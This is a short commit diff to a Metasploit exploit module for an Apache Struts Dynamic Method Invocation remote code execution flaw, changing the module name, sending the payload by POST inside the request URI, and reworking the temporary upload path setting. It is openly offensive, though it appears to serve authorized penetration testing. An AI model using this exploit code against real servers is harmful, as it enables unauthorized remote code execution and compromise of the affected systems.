Address all @FireFart's feedback

2016-04-29 11:03:15 -05:00 · 2016-04-29 11:03:15 -05:00 · e9535dbc5b
parent 6f6558923b
commit e9535dbc5b
1 changed files with 11 additions and 9 deletions
--- a/modules/exploits/linux/http/struts_dmi_exec.rb
+++ b/modules/exploits/linux/http/struts_dmi_exec.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
+      'Name'           => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
@ -53,9 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
  def send_http_request(payload)
    uri = normalize_uri(datastore['TARGETURI'])
    send_request_cgi(
-      'uri'     => uri + payload,
-      'version' => '1.1',
-      'method'  => 'GET')
+      'uri'     => "#{uri}#{payload}",
+      'method'  => 'POST')
  end

  def parameterize(params) # params is a hash
@ -75,11 +74,14 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def temp_path
-    return nil unless datastore['TMP_PATH']
-    unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
-      fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
-    end
-    datastore['TMP_PATH']
+    @tmp_path ||= lambda {
+      path = datastore['TMP_PATH']
+      return nil unless path
+      unless path.end_with?('/')
+        path << '/'
+      end
+      return path
+    }.call
  end

  def upload_file(filename, content)